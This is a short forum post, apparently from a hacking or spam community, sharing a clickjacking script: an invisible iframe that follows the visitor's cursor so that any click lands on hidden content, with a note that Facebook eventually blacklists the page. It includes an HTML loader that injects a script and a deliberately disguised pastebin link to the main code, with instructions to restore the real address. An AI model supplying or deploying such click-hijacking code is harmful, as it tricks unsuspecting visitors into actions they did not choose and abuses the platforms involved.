Humble
Registered Member
- Jul 17, 2010
- 80
- 52
Script below creates a iframe like box that follows your cursor. The iframe is invisible and requires the user to click somewhere.
Paste these codes into 2 separate files (one html, one js)
index.html
jscript.js
Credits goes out to Eric Kerr for original javascript.
PS: After a while your page gets blacklisted by facebook
Rename hxxp and .pom to correct terms.
Paste these codes into 2 separate files (one html, one js)
index.html
PHP:
<script language="javascript"> window.onload = function(){ var s = document.createElement('script'); s.src = 'jscript.js'; document.getElementsByTagName('body')[0].appendChild(s); } </script> <body> Click anywhere </body>
PHP:
hxxp://pastebin.pom/kemeguVf
PS: After a while your page gets blacklisted by facebook
Rename hxxp and .pom to correct terms.